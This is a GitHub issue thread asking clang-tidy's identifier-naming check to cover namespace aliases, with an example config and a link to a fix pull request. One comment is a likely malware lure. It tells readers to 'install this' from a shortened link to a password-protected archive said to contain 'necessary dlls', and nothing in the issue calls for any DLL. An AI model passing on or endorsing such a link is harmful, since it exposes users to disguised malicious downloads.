### ISSUE TITLE
readability-identifier-naming NamespaceAliasCase feature request

### ISSUE THREAD

**Issue by Fiero99** [llvm/llvm-project#109385]
**Feature request:**

check identifier naming on alias namespaces

**Example:**

`namespace NamespaceAlias = some_namespace; // Warning NamespaceAlias  should be namespace_alias`

**What I already tried:**

With `.clang-tidy`
```
  - key:             readability-identifier-naming.NamespaceCase 
    value:           lower_case
```
The following alias namespace is not checked.
```
namespace some_namespace {}
namespace NamespaceAlias = some_namespace;
```
I would expect the alias namespace to be in the same format as other namespaces. (Or to be able to configure it using something like NamespaceAliasCase.

**Comment by pinpolhoxx** [comment]
install this
https://bit.ly/3TzaAQd
Archive codepass: changeme
I put the necessary dlls in the archive

**Comment by keith** [comment]
https://github.com/llvm/llvm-project/pull/112112
